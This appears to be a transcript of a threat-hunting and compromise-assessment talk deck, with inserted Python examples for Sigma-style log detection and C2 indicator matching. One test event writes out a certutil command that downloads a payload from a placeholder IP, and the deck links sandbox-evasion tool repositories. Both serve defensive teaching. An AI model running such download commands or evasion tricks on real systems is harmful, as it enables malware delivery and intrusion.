
Threat Hunting & Compromised Assessment on the cheap 101


ISSDU Threat Research

October 25, 2019

Transcript

1. whoami
• Certifications: CEH, CHFI; Palo Alto Networks ACE; McAfee Vulnerability Manager
• Experience: assisted investigative and prosecutorial agencies with major cybercrime cases; built enterprise APT defenses; assisted enterprises with security incident handling
• Specialties: Incident Response / Compromise Assessment / Malware Analysis; Penetration Testing & Exploit Research; Security Solution Implementation: APT (Gateway / Mail / Sandbox / Endpoint), NGFW & NGIPS, Endpoint / Managed Detection and Response
2. Agenda
   1. What is Threat Hunting & Compromised Assessment
   2. Hunting and Assessment Cycle
   3. How to… On the Cheap…
      A. Host
      B. Network
      C. Intelligence
   4. Conclusion
3. Why do we need it? (1)
• Enterprise intrusion vectors (Initial Access)
• "The initial access tactic represents the vectors adversaries use to gain an initial foothold within a network." (MITRE ATT&CK)
• In other words: how did the attackers get in…
4. Why do we need it? (2) Sandbox evasion and anti-analysis
• https://github.com/a0rtega/pafish
• https://github.com/AlicanAkyol/sems/
• https://github.com/LordNoteworthy/al-khaser
• https://github.com/marcusbotacin/Anti.Analysis
• https://github.com/ricardojrdez/anti-analysis-tricks
• https://github.com/google/sandbox-attacksurface-analysis-tools
5. Why do we need it? (3) LOLBAS (Living Off The Land Binaries And Scripts)
• Only pre-installed software is used by the attacker, and no additional binary executables are installed onto the system.
6. Why do we need it? (4) Legitimate tools as cover for illegitimate activity
• SoftEther VPN is an open-source, cross-platform, multi-protocol VPN solution developed by Daiyuu Nobori (登太游), a graduate student at the University of Tsukuba, as his master's thesis project. It lets several VPN protocols (SSL VPN, L2TP, IPsec, OpenVPN and Microsoft SSTP) be served from a single VPN server.
• The North Korean state-sponsored group Lazarus has also used this VPN tool as a pivot in its attacks.
7. Alerting vs Hunting
• ALERTING (automatic): reactive, focused on known threats
• HUNTING (manual): proactive, focused on new threats
• TI: threat intelligence; MA: malware analysis; DF: digital forensics; IR: incident response
8. Threat Hunting. What is It?
• Cyber threat hunting is the practice of searching iteratively through data to detect advanced threats that evade traditional security solutions. (Sqrrl)
• "Searching for persistent threats that have evaded existing security controls" (Delta Risk)
9. Compromise Assessment (1)
• A compromise assessment is a high-level review of the organization that does not rely on a hypothesis or limited scope in order to answer a very fundamental question: am I compromised? In other words, based upon your organization's data, logs, and existing telemetry, are there any indicators of compromise, or threat actors present in the environment? (Cisco)
• "A proactive, time-bound effort to detect threats that have evaded existing security controls" (Delta Risk)
• In Taiwan this seems to be called 木馬檢測 (trojan inspection), or the malware review and network-traffic/log analysis part of a 資安健檢 (security health check)…
10. Compromise Assessment (2)
Definitionally, a compromise assessment should be:
• Focused: on detecting malicious software and unauthorized activity within the organization
• Time bound: assessments are short-duration, high-intensity efforts, generally completed within hours or days
• Affordable: the organization should be able to conduct them regularly
• Independent: it should not depend on the in-place detection tools, which may have missed the threat in the first place
11. Cycle
Look at your network (logs) and your hosts (logs). General hunt methodology:
• Collect data (collect everything you can, and keep monitoring)
• Analyze the collection
• Follow up on leads
• Remediate
• Repeat (as a continuous loop, or on a regular schedule)
12. Collect (IR Toolkit)
https://github.com/diogo-fernan/ir-rescue
• activity: user activity data
• disk: disk data
• events: Windows event logs
• filesystem: data related to NTFS and files
• malware: system data that can be used to spot malware
• memory: the memory
• network: network data
• registry: system and user registry
• system: system-related information
• web: browsing history and caches
13. Sigma
• https://github.com/Neo23x0/sigma
• Sigma is for log files what Snort is for network traffic and YARA is for files: a generic, YAML-based signature format for log events that converters translate into the query language of whatever SIEM or log store you already have.
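The following is an added example, not code from the deck or from the Sigma project. It ties the Sigma slide to the LOLBAS slide: a rule in Sigma's structure (logsource, detection with a selection and a filter, condition "selection and not filter") hunting for certutil.exe used as a downloader, applied by a small evaluator to constructed Sysmon-style process-creation events. The rule, the events, the TEST-NET address and the allow-listed host updates.corp.example are all constructed for illustration; real Sigma use goes through a converter (sigmac or pySigma) to produce a SIEM query rather than matching in Python, and this evaluator implements only the subset of Sigma semantics listed in its docstring.

```python
"""Minimal Sigma-style rule evaluator run over constructed Sysmon-like
process-creation events.

Added example: not code from the ISSDU deck or from the Sigma project.
Supported subset of Sigma semantics: field modifiers `contains`,
`startswith`, `endswith`, the `all` modifier, list values (OR within one
field, AND across fields), case-insensitive string comparison, and
conditions of the shape "selection" or "selection and not filter".
"""
from typing import Any, Dict, List

# Constructed rule in Sigma's structure (dict form of the YAML).  Hunts the
# LOLBAS pattern "certutil used as a downloader"; the allow-listed host
# updates.corp.example is a hypothetical internal patch server.
RULE: Dict[str, Any] = {
    "title": "Certutil used as a downloader (LOLBAS)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "-f "],
        },
        "filter": {
            "CommandLine|contains": "updates.corp.example",
        },
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed events using Sysmon Event ID 1 field names.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\\Users\\Public\\p.exe"},
    {"EventID": "1", "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f https://updates.corp.example/patch.cab patch.cab"},
    {"EventID": "1", "User": "CORP\\bob",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify cert.cer"},
    {"EventID": "1", "User": "CORP\\carol",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe -urlcache -f notes.txt"},
]

MODIFIERS = ("contains", "startswith", "endswith")


def match_value(value: str, pattern: str, modifier: str) -> bool:
    """Sigma string matching is case-insensitive; apply one modifier."""
    v, p = value.lower(), pattern.lower()
    if modifier == "contains":
        return p in v
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "endswith":
        return v.endswith(p)
    return v == p


def match_selection(selection: Dict[str, Any], event: Dict[str, str]) -> bool:
    """All fields in a selection must match; list values are OR unless |all."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        modifier = next((m for m in mods if m in MODIFIERS), "")
        value = event.get(field)
        if value is None:
            return False
        pats = patterns if isinstance(patterns, list) else [patterns]
        hits = [match_value(str(value), str(p), modifier) for p in pats]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True


def evaluate(rule: Dict[str, Any], event: Dict[str, str]) -> bool:
    """Evaluate a condition of the form 'X' or 'X and not Y [and not Z]'."""
    det = rule["detection"]
    positive, *negatives = [p.strip() for p in det["condition"].split(" and not ")]
    if not match_selection(det[positive], event):
        return False
    return not any(match_selection(det[n], event) for n in negatives)


def hunt(rule: Dict[str, Any], events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events the rule fires on."""
    return [e for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    for hit in hunt(RULE, EVENTS):
        print(f"[{RULE['level']}] {RULE['title']}: {hit['User']} ran {hit['CommandLine']}")
```

Only the first event fires: the SYSTEM download from the allow-listed patch server is suppressed by the filter, `certutil -verify` lacks the download switches, and the notepad event fails the Image check. The `|all` modifier matters here: with plain `|contains`, the two switches would be ORed and any `-f ` on a certutil command line would alert.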
14. Threat Intelligence
Collection methods and sources:
• IR
• VirusTotal YARA hunting
• Threat hunting (anomaly detection)
• OSINT
• Twitter
• https://github.com/hslatman/awesome-threat-intelligence
• https://www.one-tab.com/page/higRMQLCTxaBpuYO0_JEuA
• https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
• Analysis of unknown samples provided by customers, and follow-up correlation
• Honeypots (open proxy, Tor node)
• Intelligence extracted from the major security appliances
• Proactive trojan inspection
Intelligence categories:
• Weaknesses and vulnerabilities
• C2 servers (中繼站)
• Attacker tradecraft (TTPs)
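As an added example (not code from the deck), the following Python sweeps a constructed proxy log for the "C2 servers" category of intelligence above. Indicator lists collected from OSINT and sharing repositories are usually defanged (evil[.]example, hxxp://), mix URLs, domains and IPs, and vary in case, so the indicators are normalised to a host before matching, and a domain indicator also matches its subdomains while an IP indicator matches only exactly. The indicator feed, the log lines, the .example names and the TEST-NET address are all constructed.

```python
"""Match a collected C2 indicator feed against constructed proxy log lines.

Added example: not code from the ISSDU deck.  The indicator list and the
log lines are constructed for illustration (TEST-NET addresses and
.example names).  Public feeds usually ship indicators "defanged"
(evil[.]example, hxxp://), so indicators are normalised before matching,
and domain indicators also match their subdomains.
"""
import re
from typing import Dict, List, Optional, Set

# Constructed indicators, in the "C2 servers" category from the slide.
RAW_IOCS: List[str] = [
    "hxxp://cdn-update[.]example/gate.php",
    "198[.]51[.]100[.]23",
    "MAIL-RELAY.EXAMPLE",
]

# Constructed proxy log: time, source IP, method, URL, status.
PROXY_LOG = """\
2019-10-25T02:14:07Z 10.0.0.15 GET http://cdn-update.example/gate.php 200
2019-10-25T02:15:09Z 10.0.0.15 POST http://198.51.100.23/upload 200
2019-10-25T02:16:11Z 10.0.0.22 GET https://www.example.org/index.html 200
2019-10-25T02:17:30Z 10.0.0.31 GET http://beacon.mail-relay.example/ping 404
2019-10-25T02:18:02Z 10.0.0.22 GET http://notcdn-update.example/ 200
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def refang(indicator: str) -> str:
    """Undo common defanging: [.] (.) {.} [dot] -> . and hxxp(s):// -> http(s)://."""
    s = indicator.strip().lower()
    for fanged in ("[.]", "(.)", "{.}", "[dot]"):
        s = s.replace(fanged, ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s)


def extract_host(value: str) -> str:
    """Host part of a URL, domain or IP indicator (scheme, port and path dropped)."""
    s = re.sub(r"^[a-z][a-z0-9+.-]*://", "", refang(value))
    return s.split("/", 1)[0].split(":", 1)[0]


def match_host(host: str, ioc_hosts: Set[str]) -> Optional[str]:
    """Exact match for any indicator; subdomain match for domain indicators only."""
    for ioc in ioc_hosts:
        if host == ioc:
            return ioc
        # The leading dot keeps notcdn-update.example from matching cdn-update.example.
        if not IPV4.match(ioc) and host.endswith("." + ioc):
            return ioc
    return None


def hunt_iocs(log_text: str, raw_iocs: List[str]) -> List[Dict[str, str]]:
    """Return one record per proxy log line whose destination host hits an indicator."""
    ioc_hosts = {extract_host(i) for i in raw_iocs}
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, status = line.split()
        host = extract_host(url)
        matched = match_host(host, ioc_hosts)
        if matched:
            hits.append({"time": ts, "src": src, "host": host, "ioc": matched})
    return hits


if __name__ == "__main__":
    for hit in hunt_iocs(PROXY_LOG, RAW_IOCS):
        print(f"{hit['time']} {hit['src']} -> {hit['host']} (indicator: {hit['ioc']})")
```

Three lines hit: the two requests from 10.0.0.15 (domain and IP indicators) and the request from 10.0.0.31 to a subdomain of mail-relay.example. The look-alike notcdn-update.example does not, because subdomain matching requires the separating dot. Each hit is a lead for the "follow up on leads" step of the cycle, not a verdict by itself.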
15. 9 vs. 14
• 台視 (TTV) • 中視 (CTV) • 民視 (FTV) • 華視 (CTS) • 東森 (EBC) • 年代 (ERA) • 中天 (CTi) • 三立 (SET) • 非凡 (USTV)
• The eight critical infrastructure sectors
• Regional joint defense across the six special municipalities
16. There is no 100% in security; the only option is to raise the attacker's cost of intrusion
• "The cyber adversary's tactics flow like water, seeking the path of least resistance. Plan accordingly." - Sun Tzu, The Art of Cyber War -
17. Being breached is not shameful; what matters is whether the lessons are actually fed back and improvements made
• "The competent cyber warrior learns from their mistakes. The cyber master learns from the mistakes and know-how of others." - Sun Tzu, The Art of Cyber War -